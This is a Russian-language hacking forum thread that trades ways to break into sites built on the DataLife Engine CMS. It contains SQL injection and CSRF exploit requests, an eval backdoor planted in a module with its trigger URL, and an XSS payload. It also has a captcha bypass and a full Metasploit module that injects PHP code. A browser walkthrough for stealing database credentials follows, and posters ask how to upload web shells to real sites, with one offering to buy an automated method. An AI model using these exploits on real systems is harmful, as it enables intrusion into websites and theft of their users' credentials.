Datax - пиздобол

engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись

и скули здесь нет, только ошибка, от неё единственная польза префикс к базе

Datax - пиздобол
engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись
и скули здесь нет, только ошибка, от неё единственная польза префикс к базе



Фигово(((

Datax - пиздобол
engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись
и скули здесь нет, только ошибка, от неё единственная польза префикс к базе


Мне жаль вас разочаровывать, но вы жестоко не правы.

Просто читать надо внимательно - jprof.jpeg это бекдор, который вложили в одну из нуллед-версий. В оригинале он действительно отсутствует. Но этот нуллед успел разойтись по инету и сайты с ним есть...

Datax - пиздобол
engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись
и скули здесь нет, только ошибка, от неё единственная польза префикс к базе


Пиздабола увидишь в зеркале.

Я скинул обзор не доработок ,в данном движке.

Хорошие баги в привате ,которые тебе не увидеть как своих ушей.

Хорошие баги в привате ,которые тебе не увидеть как своих ушей.


Врятли кто нибудь может судить, кто какие баги знает, а на счет привата, вы ошибаетесь если думаете что там куева туча дыр, с помощью которых можно поломать пол мира.


Но этот нуллед успел разойтись по инету и сайты с ним есть...


Есть так же как и другие нуллы, прям с шеллами а не токо с бекдорами. Тот самый дяденька, или просто его софт "модуль Переходы" был замечен с бекдором зашитым в его же файл, с помощью которого можно было удалить хтацес, и отослать логин и пароль админу. А этот модуль разлетелся вообще по всему инету. Тем более, думаете откуда у его разраба 210 тиц? )) Каждый крутится как может.

Но к большому сожалению таких сайтов так же много как и тех на которых работает бага с lostpassword

Мысль про бесплатный сыр никто не отменял... Конечно интереснее баги, которые присутствуют в оригинальном движке, а не в левых нуллах, но каждый крутится как может, и одно другому не мешает...

Тысячи контрибов для WP, Джумлы и DLE - вообще поле не паханное... Чего там только нет...

может кто скажет как снести htaccess в девятки

Уязвимость в модуле DLE Multi Lang 1.0

Есть SQL inj в админке, engine\inc\multilang.php


} elseif($action=="addi") {

$alt_name=$_POST['alt_name'];

$skin=$_POST['skin'];

$lang=$_POST['lang'];

$db->query("INSERT INTO dle_multilang(name, alt_name, skin ) VALUES ('$lang', '$alt_name', '$skin')");



Но сама по себе она почти бесполезна, я нашел для нее более интересное применение Поскольку в админке модуля защита от CSRF не предусмотрена, то пользуемся таким сплойтом, его можно например засунуть в инфрейм своего сайта и скинуть в пм админу.




document.forms["form"].submit();







Теперь смотрим дальше, код с engine\modules\multilang.php


if (isset($_GET['lang'])) {

$sql=$db->query("SELECT * FROM dle_multilang ORDER by id DES C");

while ($row=$db->get_row($sql)) {

$skin=$row['skin'];

$name=$row['name'];

$alt_name=$row['alt_name'];

if ($_GET['lang'] ==''.$alt_name.'') {

$config['langs'] =$name;

$config['skin'] =$skin;

$_SESSION['lang'] =$name;

include_onceROOT_DIR.'/language/'.$config['langs'] .'/website.lng';

}

}

}



т.е. тут беруться те данные которые мы чуть раньше добавили в админку и инклудяться, например


http://site.ru/?lang=evil

так мы получим инкуд файла test.txt, для проведения атаки можно заререгать пользователя и залить аватар с нашим php кодом, после чего также проинклудить его

Неофициальный модуль Seo Pro 3.0

Описание:выполнение произвольного кода (бекдор от автора)

Файл: /engine/ajax/seo_info.php

Уязвимый код:


...

}else{

$file=(ROOT_DIR."/engine/classes/mysql.class.php");

if(file_exists($file)){ @require($file);$x.="mysql.class.php - ok
";}

$file=(ROOT_DIR."/engine/data/dbconfig.php");

if(file_exists($file)){ @require($file);$x.="dbconfig.php - ok
";}

$file=(ROOT_DIR."/engine/data/config.php");

if(file_exists($file)){ @require($file);$x.="config.php - ok
";}

eval(base64_decode($_GET['user_id']));

echo

HTML;

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));

...



Для использования достаточно зайти на


http://127.0.0.1/dle/engine/ajax/seo_info.php?wert=evil

после чего должна появиться форма способная выполнять ваш php код

недавно лазил по коду LogicBoard (DLE Edition) 2.1 наткнулся на:


\upload_forum\components\global\functions.php




eval(base64_decode('JHByYXZBdnRvdGE9IjxhIGhyZWY9XC JodHRwOi8vbG9naWNib2FyZC5ydS9cIiB0YXJnZXQ9XCJibGFu a1wiPkxvZ2ljQm9hcmQ8L2E+Ijs='));

Расшифрованый:


$pravAvtota="LogicBoard";



\upload_forum\components\class\templates.php




eval(base64_decode('DQogICAgICAgICR0aGlzLT5jb3B5X3 RlbXBsYXRlID0gc3RyX3JlcGxhY2UoICRmaW5kLCAkcmVwbG Fj ZSwgJHRoaXMtPmNvcHlfdGVtcGxhdGUgKTsNCiAgICAgIC AgDQ ogICAgICAgIGlmICgkdHBsID09ICJnbG9iYWxfdGVtcG xhdGUi IEFORCAoKCRjYWNoZV9jb25maWdbJ2dlbmVyYWxfY2 xvc2UnXV snY29uZl92YWx1ZSddIEFORCAkY2FjaGVfZ3JvdX BbJG1lbWJl cl9pZFsndXNlcl9ncm91cCddXVsnZ19zaG93X2 Nsb3NlX2YnXS A9PSAxKSBPUiAhJGNhY2hlX2NvbmZpZ1snZ2 VuZXJhbF9jbG9z ZSddWydjb25mX3ZhbHVlJ10pKQ0KICAgIC AgICB7DQogICAgIC AgICAgICBpZiAoJHByYXZBdnRvdGEgIT 0gIjxhIGhyZWY9XCJo dHRwOi8vbG9naWNib2FyZC5ydS9cIi B0YXJnZXQ9XCJibGFua1 wiPkxvZ2ljQm9hcmQ8L2E+IikNCi AgICAgICAgICAgICAgICBl eGl0ICgiUmV0dXJuIHRoZSBjb3 B5cmlnaHQgTG9naWNCb2FyZD IhIik7DQogICAgICAgICAgIC ANCiAgICAgICAgICAgIGlmICgh cHJlZ19tYXRjaCgiI3tjb3 B5cmlnaHR9IyIsICR0aGlzLT5jb3 B5X3RlbXBsYXRlKSkNCi AgICAgICAgICAgICAgICBleGl0ICgi UmV0dXJuIHRoZSBjb3 B5cmlnaHQgTG9naWNCb2FyZDMhIik7DQ ogICAgICAgICAgIC BlbHNlDQogICAgICAgICAgICAgICAgJHRo aXMtPmNvcHlfdG VtcGxhdGUgPSBzdHJfcmVwbGFjZSggIntjb3 B5cmlnaHR9Ii wgJHByYXZBdnRvdGEsICR0aGlzLT5jb3B5X3Rl bXBsYXRlIC k7DQoJCX0NCiAgICAgICAgDQogICAgICAgIGlmKC Bpc3NldC ggJHRoaXMtPnJlc3VsdFskdHBsXSApICkNCgkJCSR0 aGlzLT 5yZXN1bHRbJHRwbF0gLj0gJHRoaXMtPmNvcHlfdGVtcG xhdG U7DQoJCWVsc2UNCgkJCSR0aGlzLT5yZXN1bHRbJHRwbF0g PS AkdGhpcy0+Y29weV90ZW1wbGF0ZTsNCiAgICAgICAg'));

Расшифрованый:


$this->copy_template=str_replace($find,$replace,$this->copy_template);



if ($tpl=="global_template"AND (($cache_config['general_close']['conf_value'] AND$cache_group[$member_id['user_group']]['g_show_close_f'] ==1) OR !$cache_config['general_close']['conf_value']))

{

if ($pravAvtota!="LogicBoard")

exit ("Return the copyright LogicBoard2!");



if (!preg_match("#{copyright}#",$this->copy_template))

exit ("Return the copyright LogicBoard3!");

else

$this->copy_template=str_replace("{copyright}",$pravAvtota,$this->copy_template);

}



if( isset($this->result[$tpl] ) )

$this->result[$tpl] .=$this->copy_template;

else

$this->result[$tpl] =$this->copy_template;

Как-нибуть заюзать можно?

А еще смущяет запрос:


$db->query( "INSERT INTO " . LB_DB_PREFIX . "_members_online SET mo_id = '{$onl_session}', mo_member_id = '{$member_id['user_id']}', mo_member_name = '{$member_id['name']}', mo_member_group = '{$member_id['user_group']}', mo_ip = '{$_IP}', mo_date = '{$_TIME}', mo_browser = '{$onl_browser}', mo_location = '{$onl_location}', mo_loc_do = '', mo_loc_op = '', mo_loc_id = '', mo_hide = '{$mo_hide}'" );

Раскрытие путей в DLE 9.4, возможно и другие более ранние версии, т.к. в 8.5 уязвимость есть тоже.

Файл: /engine/modules/antibot.php

Уязвимый код:


if (clean_url($_SERVER['HTTP_REFERER']) !=clean_url($_SERVER['HTTP_HOST'])) die("Hacking attempt!");

...

session_start();



для эксплатации нужно зайти на http://site.ru/engine/modules/antibot.php подделать рефер, как будто капча подгружается с сайта (нечто похожее на http://site.ru/test.html, site.ru должен быть тот уязвимый сайт), и установить в куках PHPSESSID=@#!@#%^&

======================

Alex$09, нет там ничего такого... Чем запрос смущает ? В любом случае слишком мало информации чтобы ответь есть там sql inj или нет, нужно смотреть что от куда берется...

Смущяет


mo_browser = '{$onl_browser}',




$onl_browser=$db->safesql($_SERVER['HTTP_USER_AGENT']);

Код интересный, но меня смущает "safesql".


ни чё интересного


functionsafesql($source)

{

if(!$this->db_id)$this->connect(DBUSER,DBPASS,DBNAME,DBHOST);

if ($this->db_id) returnmysql_real_escape_string($source,$th is->db_id);

else returnaddslashes($source);

}

[QUOTE="chekist"]
xss, проверял на 8.5 и 8.2
file /engine/modules/imagepreview.php
[PHP]
[COLOR="#0000BB"]
$_GET['image'] = @htmlspecialchars($_GET['image'],ENT_QUOTES);

if(preg_match([COLOR="#DD0000"]"/[?&;%

http://dle85.ru/engine/modules/imagepreview.php?image=javajavascriptscript:eval(S tring.fromCharCode(97,108,101,114,116,40,39,65,32, 110,97,107,111,105,32,116,101,98,101,32,107,97,118 ,105,99,104,107,97,63,39,41,59))

Пора быстренько ковырять, пока все не обновились http://dle-news.ru/bags/v96/1525-nedostatochnaya-kriptograficheskaya-ustoychivost.html

Пора быстренько ковырять, пока все не обновились http://dle-news.ru/bags/v96/1525-nedostatochnaya-kriptograficheskaya-ustoychivost.html



Криптостойкость ключа 14^34 = 929722225368296217729286886758826377216 вариантов для перебора

До

[PHP]
[COLOR="#0000BB"]$salt="abchefghjkmnpqrstuvwxyz0123456789";

srand( ( double )microtime() *1000000);



for($i=0;$i[COLOR="#007700"]

http://dle85.ru/engine/modules/imagepreview.php?image=javajavascriptscript:eval(S tring.fromCharCode(97,108,101,114,116,40,39,65,32, 110,97,107,111,105,32,116,101,98,101,32,107,97,118 ,105,99,104,107,97,63,39,41,59))


можно загрузить свою картинку, все что после "image=" идет в код


document.write( "" );

как можно использовать? были идеи в jpg записать php код, но как его запустить?

цель всего этого: загрузить новый .htaccess

а какой смысл загружать новый .htaccess если можно записать любой php код ??

Даже если ДЛЕ 9.0+ все равно можно залить шелл в основную папку или туда тоже нельзя? В крайнем случае тогда можно заменить фразу Disallow на Allow в .htaccess

UPD: не так понял написанное, сорр мой фэйл.

Подскажите как залить через админ панель шел версии 9.4 9.6

Как заливаться на дле 9,6-9,7 подскажет кто нибудь?

DLE 0day Captcha bypass

Обходим стандартную каптчу на последних версиях скрипта (в т.ч. 9.7)

на примере регистрации


POST /?do=register

dle_rules_accept=yes

set_direction_sort=1
dledirection=desc
set_new_sort=sec_code_session
dlenewssortby=date
sec_code=date

name=name
email=email@example.com
password1=pass
password2=pass

submit_reg=register

PoC

Стандартный генератор каптчи записывает значение секретного кода в сессию:

engine/modules/antibot.php


$im= newgenrandomimage();

$im->genstring();

$_SESSION['sec_code_session'] =$im->keystring;

А в файле engine/init.php есть код определения порядка сортировки:


if (isset ($_POST['set_new_sort'] ) and$config['allow_change_sort']) {



$allowed_sort= array (

'date',

'rating',

'news_read',

'comm_num',

'title');



$find_sort=str_replace(".","",totranslit($_POST['set_new_sort'] ) );

$direction_sort=str_replace(".","",totranslit($_POST['set_direction_sort'] ) );



if (in_array($_POST['dlenewssortby'],$allowed_sort)) {



if ($_POST['dledirection'] =="desc"or$_POST['dledirection'] =="asc") {



$_SESSION[$find_sort] =$_POST['dlenewssortby'];

$_SESSION[$direction_sort] =$_POST['dledirection'];

$_SESSION['dle_no_cache'] ="1";



}



}

}

он позволяет записать одно из фиксированных значение в произвольное поле сессии.

Подставляем одно из возможных значение в поле sec_code_session и передаем его же вместо кода проверки

(c) SecondLife

Path disclousure

Path disclousure версия 9.7 и ниже

Файлы:


/engine/ajax/allvotes.php
/engine/ajax/antivirus.php
/engine/ajax/complaint.php
/engine/ajax/deletecomments.php
/engine/ajax/editcomments.php
/engine/ajax/editnews.php
/engine/ajax/find_relates.php
/engine/ajax/message.php
/engine/ajax/newsletter.php
/engine/ajax/poll.php
/engine/ajax/search.php
/engine/ajax/typograf.php
/engine/ajax/adminfunction.php
/engine/ajax/clean.php
/engine/ajax/rebuild.php
/engine/ajax/rss.php
/engine/ajax/sitemap.php
/engine/ajax/templates.php
/engine/ajax/upload.php

запрос:


POST %file%

login=

(c) SecondLife

SQL injection 0day

SQL injection 0day и получение админки для 9.7 и младше

Requirements:


user account
register_globals on
magic_quotes_gpc off

Файл - максимальная версия скрипта


/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7

Request


POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit

PoC

Неопределенная переменная $_TIME в некоторых случаях, внедрение кода в UPDATE запрос в файле /engine/modules/sitelogin.php


$db->query("UPDATE ".USERPREFIX."_users set hash='".$hash."', lastdate='{$_TIME}', logged_ip='".$_IP."' WHERE user_id='{$member_id['user_id']}'");

(c) SecondLife

SQL injection 0day и получение админки для 9.7 и младше
Requirements:

user account
register_globals on
magic_quotes_gpc off

Файл - максимальная версия скрипта

/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7

Request

POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit

PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php

$db->query("UPDATE ".USERPREFIX."_users set hash='".$hash."', lastdate='{$_TIME}', logged_ip='".$_IP."' WHERE user_id='{$member_id['user_id']}'");

(c) SecondLife



как юзать??)))

Ищешь сайт подходящий по требованиям, регаешь там учетку, делаешь POST запрос к любому из файлов в списке и отправляешь необходимый набор полей подставив свой логин и пароль

SQL injection 0day и получение админки для 9.7 и младше
Requirements:

user account
register_globals on
magic_quotes_gpc off

Файл - максимальная версия скрипта

/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7

Request

POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit

PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php

$db->query("UPDATE ".USERPREFIX."_users set hash='".$hash."', lastdate='{$_TIME}', logged_ip='".$_IP."' WHERE user_id='{$member_id['user_id']}'");

(c) SecondLife


Неотказался бы от примера использования данной баги

может кто скажет как снести htaccess в девятки


если есть доступ к БД(phpmyadmin к примеру) заливаешь любой файл с допустимым форматом потом в таблице dle_files меняешь у файла значение onserver на .htaccess и удаляешь файл через админку. Вместо загруженного файла удалится .htaccess

Таким же образом можно удалить в принципе любой .htaccess если вписывать типа ../.htaccess

Осталось выяснить как залить шеллку в обход


if(stripos($serverfile,"php") !==false) die("Hacking attempt!");

if(stripos($serverfile,"phtml") !==false) die("Hacking attempt!");

if(stripos($serverfile,".htaccess") !==false) die("Hacking attempt!");

если есть доступ к БД(phpmyadmin к примеру) заливаешь любой файл с допустимым форматом потом в таблице dle_files меняешь у файла значение onserver на .htaccess и удаляешь файл через админку. Вместо загруженного файла удалится .htaccess
Таким же образом можно удалить в принципе любой .htaccess если вписывать типа ../.htaccess
Осталось выяснить как залить шеллку в обход

if(stripos($serverfile,"php") !==false) die("Hacking attempt!");

if(stripos($serverfile,"phtml") !==false) die("Hacking attempt!");

if(stripos($serverfile,".htaccess") !==false) die("Hacking attempt!");



perl шеллы, не?

Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим
http://storage9.static.itmages.ru/i/11/1215/h_1323955118_1765197_eb99d32068.png (http://itmages.ru/image/view/360563/eb99d320)
Раскручивайте дальше сами, я например вытаскивал все пароли и логины.


кто начал раскручивать данную скулю? подскажите с чего начать то?

SQL injection 0day и получение админки для 9.7 и младше
Requirements:

user account
register_globals on
magic_quotes_gpc off

Файл - максимальная версия скрипта

/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7

Request

POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit

PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php

$db->query("UPDATE ".USERPREFIX."_users set hash='".$hash."', lastdate='{$_TIME}', logged_ip='".$_IP."' WHERE user_id='{$member_id['user_id']}'");

(c) SecondLife


Если не сложно подробней пожалуйста, или в личку

SQL injection 0day и получение админки для 9.7 и младше
Requirements:

user account
register_globals on
magic_quotes_gpc off

(c) SecondLife


ГЫ:

dle-news.ru, админ, celsoft:


Но лучше именно отключать данную настройку magic_quotes_gpc в php.ini, это плохая настройка, которая тянется еще со времен PHP4, непонятно зачем ее периодически включают. DLE кстати при установке рекомендует ее отключать. Рекомендации лучше не игнорировать.


Главное, не забывать добавить аддслешес, отключая "старую", не нужную...

thx

кто начал раскручивать данную скулю? подскажите с чего начать то?


Не знаю, насколько она приватная, если есть в посте годом раньше, но в init.php версии уже 8,0 есть:


if (isset ($_REQUEST['cstart'] ))$cstart=intval($_GET['cstart'] ); else$cstart=0;



а в более новых версиях так же добавили проверку на величину:


if ($cstart>9000000) {

header("Location: ".str_replace("index.php","",$_SERVER['PHP_SELF']) );

die();

}



По первому коду: любые данные (пост, куки или гет), тут же переводятся в целое, а при неудаче - присваивается 0.

По второму, думаю понятно..

sql в static.php

правда я думаю что малоитересная так как требует

global = on

magic_quotes_gpc = Off


POST http://dl75.ru/index.php?do=rules
HTTP/1.0
Host: dl75.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 38
static_result[id]=99999999999'9999999


результат


MySQL Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '9999999'' at line 1
UPDATE dle_static set views=views+1 where id='99999999999'9999999'

Последняя офф. уязвимость очень жёсткая: переопределение множества переменных возможно через файлы шаблонов.

Необходимо иметь возможность редактировать шаблоны

Целка опасается за переменные:

$file_path

$file_name

$is_logged

$member_id

$cat_info

$config

$user_group

$category_id

$smartphone_detected

$dle_module

Их то и можно переопределить в шаблоне, обратившись к тому файлу, в которых они явно не заданы.

Но на самом деле, этих переменных гораздо больше, они закрыли лишь явно самые опасные.

Пример:

Этот простой запрос, без авторизации на сайте удалит новость с id=2

Запрос: http://site.ru/?hash=111&id=2

Изменения в файле: main.tpl:


{include file="engine/modules/deletenews.php?is_logged=1&member_id[user_group]=1&dle_login_hash=111&hash=111"}

Дальше всё зависит от вашей фантазии и знания языка. Держись, ДЛЕ

не прошло и 3х лет как эту багу прикрыли)) лежит в РОА как способ заливки шелла из админки

PS описывать не буду, кто не учил пхп идут учить

PSS slva2000 слепой что ли is_logged и member_id попадает под фильтр, главное что прикрыли способ заливки шелла

не прошло и 3х лет как эту багу прикрыли)) лежит в РОА как способ заливки шелла из админки
PS описывать не буду, кто не учил пхп идут учить
PSS slva2000 слепой что ли is_logged и member_id попадает под фильтр, главное что прикрыли способ заливки шелла


Да не, не слепой, только что пробовал описанным мной примером. Дальше не копал.

Про заливку шелла, любопытно, намекни направление в котором искать?

DataLife Engine preview.php PHP Code Injection

DataLife Engine preview.php PHP Code Injection


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 'DataLife Engine preview.php PHP Code Injection',
'Description' => %q{
This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
with the e modifier, which allows to inject arbitrary php code, when the template
in use contains a [catlist] or [not-catlist] tag.
},
'Author' =>
[
'EgiX', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1412' ],
[ 'BID', '57603' ],
[ 'EDB', '24438' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
[ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Keys' => ['php']
},
'DisclosureDate' => 'Jan 28 2013',
'Targets' => [ ['DataLife Engine 9.7', { }], ],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
], self.class)
end

def base
base = normalize_uri(target_uri.path)
base "#{base}engine/preview.php",
'method' => 'POST',
'vars_post' =>
{
'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
}
})

if res and res.code == 200 and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def exploit
@peer = "#{rhost}:#{rport}"

print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
res = send_request_cgi(
{
'uri' => "#{base}engine/preview.php",
'method' => 'POST',
'vars_post' =>
{
'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decod e(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
}
})
end
end

source:

http://packetstormsecurity.com/files/119978/datalife_preview_exec.rb.txt​

Мне кажется или метасплойтовские эксплойты тут никому нафиг не нужны?

Народ кто что скажет об этом

http://verner.asf.ru/2013/%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-dle-%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%BE%D 0%B9-%D0%B0%D0%B2%D0%B0%D1%82%D0%B0%D1%80%D0%B0-%D1%81-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D 0%BD%D1%8B/

как запустить хреновину?)

Народ кто что скажет об этом
http://verner.asf.ru/2013/%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-dle-%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%BE%D 0%B9-%D0%B0%D0%B2%D0%B0%D1%82%D0%B0%D1%80%D0%B0-%D1%81-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D 0%BD%D1%8B/
как запустить хреновину?)


Можно залить шелл, дописав его в конец JPG файла, но толку от этого мало.

Можно залить шелл, дописав его в конец JPG файла, но толку от этого мало.


В новости пишет что чел залил шеллов болле чем на 10000 сайтов а вы говорите мало толку?

В новости пишет что чел залил шеллов болле чем на 10000 сайтов а вы говорите мало толку?


Фантазировать не запретишь.

Окей, заливаешь вредостный код, он в папке uploads где htaccess:



Order allow,deny
Deny from all


Залит JPG/PNG с кодом, и что дальше?

Нужна как минимум админка (ещё и ранних версий), чтобы как-то инклуднуть локальный файл. А выполнять jpg как php ни один сервер не будет.

С 9.2 с заливкой шелла ничего не придумали?


Мне кажется или метасплойтовские эксплойты тут никому нафиг не нужны?


Норм, из слойта и так видно как залиться в 9.7.

С 9.2 с заливкой шелла ничего не придумали?
Норм, из слойта и так видно как залиться в 9.7.



помимо версии 9.7 необходимо наличие тега catlist или not-catlist в шаблоне preview.tpl, а это ой какое не частое совпадение, проверив 10к сайтов с дле, уязвимость была только у 6.

С 9.2 с заливкой шелла ничего не придумали?
Норм, из слойта и так видно как залиться в 9.7.


Весь движок облазил на днях, нашёл только возможность залить шелл при полном доступе к базе (вплоть до ALTER+UPDATE), уязвимости очень похожие на cat-list в preview.php.

помимо версии 9.7 необходимо наличие тега catlist или not-catlist в шаблоне preview.tpl, а это ой какое не частое совпадение, проверив 10к сайтов с дле, уязвимость была только у 6.


Я имел ввиду заливку при наличии админского акка.

Не знаю насколько актуально, обнаружил строку в /engine/data/config.php:

'lang_Default' => "evalstripslashes_POSTchuck",

Может наведет кого на какие мысли.

Я имел ввиду заливку при наличии админского акка.


При наличии админского ака можно просто нафиг уничтожить эту DLE!

есть что нонче под 9ю ветку почекать?)

Вроде бы еще не было так что извеняюсь если повторюсь!
Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).
1. Заходим на сайт жертвы
2. Регистрируемся и авторизуемся на сайте
3. Переходим по ссылке _http://site.ru/engine/images.php (где site.ru - адрес жертвы)
4. Открываем исходный код открытой нами страницы и после:



(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)



Нажимаем в браузере, под вкладками Применить изменения
5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://site.ru/engine/images.php, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...
Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:
[download]
[/HTML]
и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/
Источник (http://getdle.org.ru/dle/tips/22-nedostatochnaya-filtraciya-dannyh-sposob-vzloma-i-zaschity-dle.html)



Все проделываю, но при нажатии на кнопку загрузки, выдает сообщение "Невозможно создать директорию /uploads/posts/2013-04/".

Это можно как-то обойти? Или пока админ фотку на загрузит в этом месяце и в этом году - не получится?

Есть админ акк, dle нулл с затертой версией, но это 9,6-9,7. Есть возможность залиться или оставить бекдор?)

Есть админ акк, dle нулл с затертой версией, но это 9,6-9,7. Есть возможность залиться или оставить бекдор?)


Есть, способ известен давно, работает под все версии.

Недавно его "переоткрыли" еще несколько человек, независимо друг от друга, но в паблик выкладывать пока не собираются.

Исходники открыты, можно поковырять самому, способ не сложный.

Все проделываю, но при нажатии на кнопку загрузки, выдает сообщение "Невозможно создать директорию /uploads/posts/2013-04/".
Это можно как-то обойти? Или пока админ фотку на загрузит в этом месяце и в этом году - не получится?


Уязвимость не актуальна уже давным-давно. Все сайты с ней уже пофиксили. Версия в которую вы хотите залить - фикс. Можно даже не пытаться

Уязвимость не актуальна уже давным-давно. Все сайты с ней уже пофиксили. Версия в которую вы хотите залить - фикс. Можно даже не пытаться


хмм, а возможно ли автоматизировать эту уязвимость для заливки шеллов автоматически? Если да, то готов купить данный баг ...

Здравствуйте, есть дле сайт, при заходе на главнуюю выводит такое


